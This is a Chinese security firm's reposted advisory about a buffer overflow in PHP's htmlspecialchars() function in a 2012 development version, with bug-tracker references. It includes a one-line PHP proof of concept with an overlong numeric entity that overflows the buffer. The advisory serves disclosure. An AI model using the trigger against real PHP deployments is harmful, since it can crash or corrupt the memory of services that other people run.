PHP 'htmlspecialchars()'函数缓冲区溢出漏洞_安全漏洞

		红科网安(北京)科技有限公司	联系我们 \| 加入收藏
			信息安全紧急求助：400-6662-110

红科网安 / 技术研究

融汇优秀技术创新攻防理念打造安全专家！ Honkwin (Beijing) Science and Technology Co.Ltd

技术研究

业界动态

安全漏洞

技术文章

安全事故紧急求助：

400-6662-110

客服热线：

010-62663110转611/614
010-62717538转611/614


	在线客服 - 王小姐
	在线客服 - 杨先生
	技术支持 - 张先生
	技术支持 - 黄工
	售后服务 - 江工
	商务合作 - 季先生

PHP 'htmlspecialchars()'函数缓冲区溢出漏洞

2012-02-07 09:25:36 作者： honkwin 来源：浏览次数：0

SSV-ID: 30089

SSV-AppDir: PHP

发布时间: 2012-02-03

漏洞版本:

php 5.4SVN-2012-02-03 (SVN)

漏洞描述:

Bugtraq ID: 51860

PHP是一款流行的编程语言

由于循环只保证开始处40字节可用，超长实体可导致缓冲区溢出：

<?php
echo htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',
ENT_QUOTES, 'UTF-8', false), "
";

<* 参考

https://bugs.php.net/bug.php?id=60965

HONKWIN安全建议:

厂商解决方案

目前没有详细解决方案提供：
http://www.php.net/